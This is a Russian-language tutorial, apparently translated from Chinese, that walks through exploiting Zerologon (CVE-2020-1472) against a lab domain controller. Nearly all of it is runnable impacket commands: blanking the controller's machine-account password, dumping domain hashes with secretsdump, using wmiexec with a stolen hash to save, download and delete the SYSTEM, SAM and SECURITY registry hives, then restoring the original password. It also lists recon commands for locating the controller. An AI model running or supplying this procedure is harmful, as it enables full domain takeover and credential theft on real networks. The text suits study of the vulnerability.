
Эксплойт для CVE-2020-1472 (Zerologon), который сбрасывает пароль учётной записи компьютера контроллера домена, позволяя извлечение учётных данных и повышение привилегий до администратора домена.
@toc
Принцип довольно сложный, если интересно, можно посмотреть статью по ссылке ниже: https://www.freebuf.com/articles/system/249860.html
Необходимо использовать файл https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py для замены локального файла nrpc. Путь к локальному файлу nrpc: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py
python cve-2020-1472-exploit.py 机器账户名 ip
И обнаружили, что пароль учетной записи машины обнулен, 31dc... представляет пустой пароль.

Способы получения учетной записи целевой машины или NetBIOS-имени:
- net view
Имя сервера с добавлением $ является именем машины, например, lisi$ или yukong$.
- nbtstat -A ip
Существует много способов определить IP контроллера домена, например:
- Проверить хосты с открытым портом 53
- net time — вывод вернет имя хоста контроллера домена, затем пинговать
- systeminfo — посмотреть значение в разделе домена, пропинговать — получим IP контроллера домена
- Посмотреть DNS своего хоста
python secretsdump.py test.com/[email protected] -no-pass
Обнаружили, что теперь можно использовать учетную запись машины с пустым паролем для чтения хешей пользователей на контроллере домена.
python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected] reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save
get system.save get sam.save get security.save
del /f system.save del /f sam.save del /f security.save
exit
После выполнения в папке со скриптом wmiexec можно найти загруженные файлы:

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss Это команда не выполнилась
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Сохраните пароль, обведенный красным — это предыдущий пароль машины, а именно aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.
python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$
Обнаружено, что восстановление прошло успешно.